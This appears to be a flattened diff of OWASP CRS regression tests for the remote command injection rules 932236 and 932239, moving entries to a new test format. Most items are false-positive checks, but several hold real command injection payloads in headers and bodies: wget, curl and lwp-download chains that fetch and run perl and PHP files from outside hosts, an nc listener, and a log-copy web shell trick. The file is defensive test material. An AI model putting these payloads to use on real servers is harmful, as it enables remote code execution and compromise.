text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 43 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-44 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: 
en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 44 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-45 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 45 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=settings" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-46 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=settings" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 46 desc: False positive against "time" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "var=hello; time he came" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-47 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=hello; time he came" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932236] + - test_id: 47 desc: False positive against "more" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a hero; more than" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-48 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a hero; more than" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932236] + - test_id: 48 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=environment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-49 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + 
Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=environment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 49 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-50 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 50 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=env --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-51 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=env --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 51 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-52 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 52 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=;`cat<<p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 4 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 5 desc: 
True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: Something true positive „The Title”. After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 6 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl 
p3.txt;rm -rf - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 7 desc: System Command Injection (932239) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-8 + - 
input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 8 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: Something true positive „The Title”. 
After space or new line more characters - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: Something true positive „The Title”. After space or new line more characters + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 9 desc: "False negative report - user agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ;cp /var/log/apache2/error.log evil.php - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: ;cp /var/log/apache2/error.log evil.php + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932239] + - test_id: 10 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "python-requests/2.31.0" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "python-requests/2.31.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 11 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Python-urllib/3.9" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Python-urllib/3.9" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 12 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - 
version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 13 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "w3m/0.5.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "w3m/0.5.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 14 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic 
x86_64; 170x48)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 15 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "wget" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "wget" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 16 desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "curl/7.81.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "curl/7.81.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 17 
desc: "Negative test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Cpanel-HTTP-Client/1.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Cpanel-HTTP-Client/1.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932239] + - test_id: 18 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: a=nc&&$a -nlvp 555 - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: a=nc&&$a -nlvp 555 + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932239] + - test_id: 19 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: a=nc&&$a -nlvp 555 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-20 + - input: + dest_addr: 127.0.0.1 + 
headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: a=nc&&$a -nlvp 555 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932239] + - test_id: 20 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=comment" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=comment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 21 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=settings" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=settings" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 22 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "environment" - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-23 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "environment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 23 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=environment" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=environment" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 24 desc: "FP with word 